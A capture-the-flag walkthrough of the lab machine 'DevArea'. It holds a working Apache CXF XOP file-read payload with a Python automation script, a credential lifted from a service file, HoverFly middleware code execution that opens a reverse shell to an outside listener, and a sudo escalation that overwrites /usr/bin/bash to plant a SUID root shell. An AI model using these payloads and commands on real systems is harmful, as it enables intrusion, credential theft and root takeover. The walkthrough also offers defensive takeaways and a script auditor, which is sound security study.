HTB-Season10-DevArea
Overview
DevArea is a medium-difficulty Linux machine centred around a developer-hiring web platform. The attack chain links several interesting techniques: anonymous FTP enumeration, a local file read through the xop:Include href handling of an Apache CXF SOAP service (MTOM/XOP), credential harvesting from a leaked systemd service file, remote code execution through HoverFly's middleware API, and finally a sudo privilege escalation against a custom monitoring script that invokes bash by bare name rather than by absolute path.
Reconnaissance
Port Scan
nmap -Pn -sC -sV 10.129.14.111
The scan reveals the following open services:
| Port | Service | Notes |
|---|---|---|
| 21/tcp | FTP (vsftpd 3.0.5) | Anonymous login allowed |
| 22/tcp | SSH | Standard OpenSSH |
| 80/tcp | HTTP (Apache 2.4.58) | DevArea — redirects to devarea.htb |
| 8080/tcp | HTTP (Jetty) | 404 on root; employee SOAP service |
| 8500/tcp | fmtp | — |
| 8888/tcp | HTTP | HoverFly API |

A quick curl -I against port 80 confirms a 302 redirect to http://devarea.htb, so we add the hostname to /etc/hosts.

Foothold
Anonymous FTP — Harvesting employee-service.jar
The FTP service permits anonymous login. The /pub directory contains a single file of interest:
-rw-r--r-- 1 ftp ftp 6445030 Sep 22 2025 employee-service.jar
We pull it down with get employee-service.jar. Decompiling the JAR gives us the internal SOAP endpoint structure and confirms the application is built on Apache CXF.

Web Enumeration — DevArea (Port 80 / 8080)
The main site on port 80 (devarea.htb) is a developer-marketplace platform with login/register functionality — nothing immediately exploitable.
Browsing to port 8080 and navigating to the WSDL endpoint reveals the SOAP service:
http://devarea.htb:8080/employeeservice?wsdl

The WSDL exposes a single operation — submitReport — that accepts a report complex type containing:
- confidential (boolean)
- content (string)
- department (string)
- employeeName (string)
The content field accepts arbitrary string input, making it a prime candidate for XML-based injection.

Exploitation — XOP Include File Read (Apache CXF MTOM, CVE-2022-46364)
Apache CXF processes MTOM/XOP (XML-binary Optimized Packaging) by default. An xop:Include element is meant to reference a MIME attachment of the same message by cid: URI, but affected CXF versions resolve whatever URI the href attribute carries. The underlying issue is tracked as CVE-2022-46364 (SSRF via the xop:Include href in MTOM requests, fixed in CXF 3.4.10 and 3.5.5); pointing the href at a file:// URI turns the same primitive into local file disclosure, because the server reads the file and binds its contents to the field. By crafting a multipart SOAP request with such an xop:Include inside the content field, we can coerce the server into reading and returning arbitrary files.
Reading /etc/passwd
Payload (payload.xml). The blank line between the part headers and the XML is mandatory, and multipart part headers should be CRLF-terminated (RFC 2046); if the service rejects the request, convert the file with unix2dos before sending:
--uuid:exploit-boundary
Content-Type: application/xop+xml; charset=UTF-8; type="text/xml"
Content-Transfer-Encoding: 8bit
Content-ID: <root.message@cxf.apache.org>

<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:tns="http://devarea.htb/">
<soap:Body>
<tns:submitReport>
<arg0>
<confidential>false</confidential>
<content>
<xop:Include xmlns:xop="http://www.w3.org/2004/08/xop/include"
href="file:///etc/passwd" />
</content>
<department>IT</department>
<employeeName>Attacker</employeeName>
</arg0>
</tns:submitReport>
</soap:Body>
</soap:Envelope>
--uuid:exploit-boundary--

Delivery. The Content-Type header has to be passed as a single line: a backslash continuation inside single quotes would send literal backslashes and newlines to the server, and the multipart boundary would never be matched. The -k flag is unnecessary for plain HTTP.
curl -i -s -X POST "http://devarea.htb:8080/employeeservice" \
-H 'Content-Type: multipart/related; type="application/xop+xml"; boundary="uuid:exploit-boundary"; start="<root.message@cxf.apache.org>"; start-info="text/xml"' \
--data-binary @payload.xml
The server responds with the contents of /etc/passwd base64-encoded inside the SOAP response. Decoding reveals the local user dev_ryan with a home directory at /home/dev_ryan.
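Building the multipart body by hand is error-prone (the blank line after the part headers and the line endings are the usual mistakes), so the following is an added helper that is not part of the original write-up. It assembles the same MTOM/XOP request for any href, emits the matching Content-Type header, and pulls the base64-encoded file contents out of the SOAP response. It assumes the namespace http://devarea.htb/ and the submitReport/arg0 shape from the WSDL; since the write-up does not fix the name of the response element, the parser accepts any element whose text is valid base64, which is a heuristic.

```python
"""MTOM/XOP file-read request builder and response parser (added example)."""
import base64
import binascii
import urllib.request
import xml.etree.ElementTree as ET

BOUNDARY = "uuid:exploit-boundary"
ROOT_CID = "<root.message@cxf.apache.org>"
ENDPOINT = "http://devarea.htb:8080/employeeservice"  # endpoint from the write-up


def build_envelope(href: str) -> str:
    """SOAP body whose content field carries an xop:Include pointing at `href`."""
    return (
        '<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" '
        'xmlns:tns="http://devarea.htb/">'
        "<soap:Body><tns:submitReport><arg0>"
        "<confidential>false</confidential>"
        "<content>"
        f'<xop:Include xmlns:xop="http://www.w3.org/2004/08/xop/include" href="{href}"/>'
        "</content>"
        "<department>IT</department>"
        "<employeeName>Attacker</employeeName>"
        "</arg0></tns:submitReport></soap:Body></soap:Envelope>"
    )


def build_mtom_body(href: str, boundary: str = BOUNDARY) -> bytes:
    """multipart/related body with one root part: CRLF line endings and a blank
    line between the part headers and the XML, as RFC 2046 requires."""
    lines = [
        f"--{boundary}",
        'Content-Type: application/xop+xml; charset=UTF-8; type="text/xml"',
        "Content-Transfer-Encoding: 8bit",
        f"Content-ID: {ROOT_CID}",
        "",
        build_envelope(href),
        f"--{boundary}--",
        "",
    ]
    return "\r\n".join(lines).encode("utf-8")


def content_type_header(boundary: str = BOUNDARY) -> str:
    """The single-line Content-Type value that curl -H must carry."""
    return (
        'multipart/related; type="application/xop+xml"; '
        f'boundary="{boundary}"; start="{ROOT_CID}"; start-info="text/xml"'
    )


def extract_included_files(response_xml: bytes) -> list:
    """Decode every text node that is valid base64 (heuristic: the response
    element name is not fixed by the write-up, so any element qualifies)."""
    out = []
    for el in ET.fromstring(response_xml).iter():
        text = (el.text or "").strip()
        if len(text) < 8 or len(text) % 4:
            continue
        try:
            out.append(base64.b64decode(text, validate=True))
        except (binascii.Error, ValueError):
            continue
    return out


def read_remote_file(path: str, endpoint: str = ENDPOINT) -> list:
    """Send the request over the network and return the decoded file(s)."""
    req = urllib.request.Request(
        endpoint,
        data=build_mtom_body(f"file://{path}"),
        headers={"Content-Type": content_type_header()},
        method="POST",
    )
    with urllib.request.urlopen(req, timeout=15) as resp:
        return extract_included_files(resp.read())


if __name__ == "__main__":
    for blob in read_remote_file("/etc/passwd"):
        print(blob.decode("utf-8", "replace"))
```

read_remote_file("/etc/systemd/system/hoverfly.service") reuses the same primitive for the next step; the builder is the part worth keeping, because the same body with a cid: href is also what a legitimate client sends, which is exactly why the server trusts it.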


Reading the HoverFly Service File
With a valid username in hand and the HoverFly API on port 8888 already identified, systemd unit files are the next target: the unit that starts HoverFly should reveal how, and as whom, the daemon runs.
Updated href:
href="file:///etc/systemd/system/hoverfly.service"

Decoding the response yields the full service unit:
[Unit]
Description=HoverFly service
After=network.target
[Service]
User=dev_ryan
Group=dev_ryan
WorkingDirectory=/opt/HoverFly
ExecStart=/opt/HoverFly/hoverfly -add -username admin \
-password O7IJ27MyyXiU -listen-on-host 0.0.0.0
[Install]
WantedBy=multi-user.target
Credentials harvested: admin : O7IJ27MyyXiU

Lateral Movement — HoverFly Middleware RCE (CVE-2026-23744)
HoverFly is a service-virtualisation proxy. Its admin API (port 8888) supports custom middleware — arbitrary executables that HoverFly passes HTTP request/response pairs through. Authenticated access to this API means we can register a reverse-shell payload as middleware.
Step 1 — Authenticate and Obtain a JWT
curl -i -X POST http://devarea.htb:8888/api/token-auth \
-H "Content-Type: application/json" \
-d '{"username": "admin", "password": "O7IJ27MyyXiU"}'
The API returns a JSON body whose token field holds a JWT bearer token. We store it in $TOKEN.

Step 2 — Register a Malicious Middleware
Using the v2 middleware endpoint:
curl -i -s -k -X PUT "http://devarea.htb:8888/api/v2/hoverfly/middleware" \
-H "Authorization: Bearer $TOKEN" \
-H "Content-Type: application/json" \
-d @payload_rce.json
The payload_rce.json references a listener on our Kali machine (10.10.15.148:4444).

Step 3 — Catch the Shell
nc -lvnp 4444
HoverFly executes the middleware, delivering a shell as dev_ryan.
uid=1001(dev_ryan) gid=1001(dev_ryan) groups=1001(dev_ryan)
User flag captured from /home/dev_ryan/user.txt.

Privilege Escalation — sudo PATH Hijack via syswatch.sh
Enumeration
Checking sudo permissions for dev_ryan:
(ALL) NOPASSWD: /opt/syswatch/syswatch.sh
The script at /opt/syswatch/syswatch.sh calls external binaries without absolute paths. Running it with --version prints 1.0.0, and reading the script shows that it invokes programs such as bash by bare name rather than by full path, leaving the lookup to whatever PATH and filesystem state the root invocation sees.

Exploitation
We overwrite /usr/bin/bash itself with a stub that copies /bin/sh to /tmp/rootsh with the SUID bit set, then trigger the script as root via sudo so that its unqualified bash call runs the stub. This presupposes that /usr/bin/bash is writable by dev_ryan on this box (check with ls -l /usr/bin/bash first; on a correctly permissioned system the redirection fails and the unqualified call is only hijackable through a writable directory that precedes /usr/bin in sudo's PATH). The stub copies /bin/sh rather than bash because, at that point, bash is the stub.
# Run these from /bin/sh, not bash: the killall below would otherwise take your own shell with it
# Stage the malicious /usr/bin/bash stub; overwriting in place keeps the existing executable mode bits
echo '#!/bin/sh' > /usr/bin/bash
echo 'cp /bin/sh /tmp/rootsh' >> /usr/bin/bash
echo 'chmod 4755 /tmp/rootsh' >> /usr/bin/bash
# Kill existing bash processes so the stub is re-read; if the echo above fails with
# "Text file busy", run this first (a running executable cannot be written to) and retry
killall -9 bash
# Trigger as root: syswatch.sh calls bash by name, which now resolves to our stub
sudo /opt/syswatch/syswatch.sh --version
# Execute the SUID shell; -p keeps the effective uid instead of dropping to the real one
/tmp/rootsh -p
id
uid=1001(dev_ryan) gid=1001(dev_ryan) euid=0(root) groups=1001(dev_ryan)
Root flag captured from /root/root.txt.
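The defensive counterpart to this section, and to the takeaway about auditing sudo-allowed scripts, is a quick check for commands a script invokes without an absolute path and for whether the invoking user could tamper with what they resolve to. The following is an added example, not the box's syswatch.sh and not part of the write-up. It tokenises simple commands heuristically rather than with a full shell parser, skips shell keywords and builtins, and for every bare command reports where it resolves on the given PATH, whether that file is writable, and which writable PATH directories are searched before it (the classic PATH-hijack condition). SAMPLE_SCRIPT is constructed for illustration.

```python
"""Find PATH-resolved commands in a sudo-allowed shell script (added example)."""
import os
import re
import shlex
import shutil

KEYWORDS = {"if", "then", "else", "elif", "fi", "do", "done", "while", "until",
            "for", "in", "case", "esac", "!", "time", "{", "}"}
BUILTINS = {"echo", "exit", "cd", "export", "local", "return", "set", "unset",
            "read", "printf", "test", "[", "[[", "source", ".", "eval", "shift",
            "true", "false", "trap", "declare", "readonly", "exec", "wait"}
SPLIT = re.compile(r"\|\||&&|[|;&]|\$\(|`")      # simple-command separators
NAME = re.compile(r"^[A-Za-z_][\w.+-]*$")         # plausible command names
ASSIGN = re.compile(r"^[A-Za-z_]\w*=")            # leading VAR=value words
FUNC_DEF = re.compile(r"^\s*(function\s+\w+|\w+\s*\(\))")

# Constructed stand-in for a monitoring script; not the real syswatch.sh.
SAMPLE_SCRIPT = """#!/bin/bash
# prints a version banner, then gathers system stats
VERSION=1.0.0
if [ "$1" = "--version" ]; then echo "$VERSION"; exit 0; fi
bash -c 'uptime' 2>&1
/usr/bin/df -h | grep /dev/ > /tmp/disk.log
"""


def unqualified_commands(script: str) -> list:
    """Bare command names (no '/') that the shell would look up through PATH."""
    found = []
    for raw in script.splitlines():
        line = "" if raw.startswith("#!") else raw.split("#", 1)[0]
        if FUNC_DEF.match(line):
            continue                       # `name() {` / `function name` is not a call
        for seg in SPLIT.split(line):
            seg = seg.replace("(", " ").replace(")", " ")
            try:
                words = shlex.split(seg)
            except ValueError:             # unbalanced quotes: whitespace fallback
                words = seg.split()
            while words and (words[0] in KEYWORDS or ASSIGN.match(words[0])):
                words.pop(0)
            if not words:
                continue
            cmd = words[0]
            if cmd in BUILTINS or "/" in cmd or not NAME.match(cmd):
                continue
            if cmd not in found:
                found.append(cmd)
    return found


def resolve(cmd: str, path: str = None) -> dict:
    """Where `cmd` resolves on `path` (default: this process's PATH) and what an
    attacker could tamper with: the binary itself, or a writable dir before it."""
    search_str = os.environ.get("PATH", os.defpath) if path is None else path
    search = [os.path.normpath(d) for d in search_str.split(os.pathsep) if d]
    full = shutil.which(cmd, path=path)
    target_dir = os.path.dirname(full) if full else None
    hijack_dirs = []
    for d in search:
        if d == target_dir:
            break
        if os.access(d, os.W_OK):
            hijack_dirs.append(d)
    return {
        "cmd": cmd,
        "resolved": full,
        "writable_file": bool(full) and os.access(full, os.W_OK),
        "hijack_dirs": hijack_dirs,
    }


def audit(script: str, path: str = None) -> list:
    """One finding per unqualified command in the script."""
    return [resolve(c, path) for c in unqualified_commands(script)]


if __name__ == "__main__":
    for finding in audit(SAMPLE_SCRIPT):
        print(finding)
```

For a sudo target the PATH that matters is the one sudo applies (secure_path in /etc/sudoers, shown by sudo -l), so pass that string as path; a finding with writable_file set is the DevArea situation, and a non-empty hijack_dirs is the textbook PATH hijack.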

Attack Chain Summary
Anonymous FTP
└─▶ employee-service.jar (SOAP structure leak)
└─▶ XOP Include via SOAP (Apache CXF MTOM href file read)
└─▶ /etc/passwd → user: dev_ryan
└─▶ /etc/systemd/system/hoverfly.service → admin:O7IJ27MyyXiU
└─▶ HoverFly API (JWT auth)
└─▶ Middleware RCE (CVE-2026-23744)
└─▶ Shell as dev_ryan → user.txt
└─▶ sudo PATH hijack (syswatch.sh)
└─▶ root → root.txt
Key Takeaways
- XOP Include is a powerful file-read primitive. Apache CXF (and other SOAP stacks) that process MTOM without restricting xop:Include hrefs to cid: attachment references can expose arbitrary server-side files. Treat any SOAP service accepting content fields with the same scrutiny as an XXE sink.
- Credentials in systemd unit files are high-value targets. Unit files frequently embed plaintext credentials in ExecStart or Environment= lines and are world-readable by default. Chaining a file-read vulnerability against /etc/systemd/system/ can be game-changing; secrets belong in a restrictively permissioned EnvironmentFile= or in systemd's LoadCredential= mechanism, not on the command line.
- HoverFly middleware is essentially a remote code execution primitive when the admin API is exposed. Any proxy/gateway product with a programmable middleware layer and an exposed admin API is functionally an RCE vector if credentials are weak or reused.
- Unsafe sudo scripts that invoke binaries by name are hijack candidates. Always audit sudo-allowed scripts for unqualified binary calls, especially when the script runs with NOPASSWD, and check both whether the resolved binary is writable and whether any directory earlier in sudo's PATH is.